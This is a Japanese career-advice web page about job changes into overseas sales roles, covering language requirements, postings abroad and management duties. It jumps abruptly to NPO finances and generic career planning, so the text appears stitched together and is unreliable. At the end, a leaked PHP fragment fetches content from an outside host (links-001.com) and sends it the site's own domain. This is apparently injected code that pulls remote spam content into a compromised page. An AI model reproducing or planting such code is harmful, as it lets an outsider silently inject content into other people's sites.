前へ
次へ

海外営業求人の転職内容

営業求人とはいっても、海外営業という求人情報は、転職エージェントでなければ、一般求人情報誌には掲載されてはいないかもしれません。
自社製品を海外の顧客に向けて販売をする営業求人ですが、海外の拠点に駐在して活動をする営業と、国内にいて海外の代理店や駐在員からの注文や要望を受ける営業求人が出ています。
いずれにしても、そしてこれからの就活生にとっても語学力なくしてエントリーはできない業種になります。
また、既婚者の場合には、海外勤務ができない場合もあるでしょうから、ご家族としっかり話し合う場を設けておきましょう。
それぞれの国の分化や価値観に応じて提案の切り口を変えるなど、高い交渉力が求められるこの職種、海外駐在員であれば、現地事務所の経理やスタッフの管理なども担うため、マネジメント手法もしっかり得ておきたいものです。
こうした職種への転職は、給与面や待遇よりも一種のステータスであったり、異文化に触れたい者がエントリーしています。
特に、『NPO』はボランティア活動だけでなく、収益事業も行います。
ここで生まれる利益は、出資者やスタッフに配分されるのではなく、次の活動資金となります。
この資金には人件費なども入っています。
もちろん、海外で色んなことを吸収し、転職者同士がNPOを立ち上げることも多く、活況を呈しているようです。
転職というからには、漠然と5年後、10年後を考えているわけではないでしょう。
具体的な場面を想像しているからこそ、このままではダメだと活動しているのでしょう。
年代的に、なかなか難しいものがあるかもしれませんが、希望する会社に入れたとして、そこでの最終目標をはっきりさせておきたいものです。
人事異動を想像して、将来設計を描きましょう。
異動もいいでしょう。
多くの部署を渡り歩き、経営全体に携わりたいのか、あるいは専門的な仕事にこだわりたいのか、徹底的に深く追求したいのか、塾考することは後悔しないために必要なことです。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top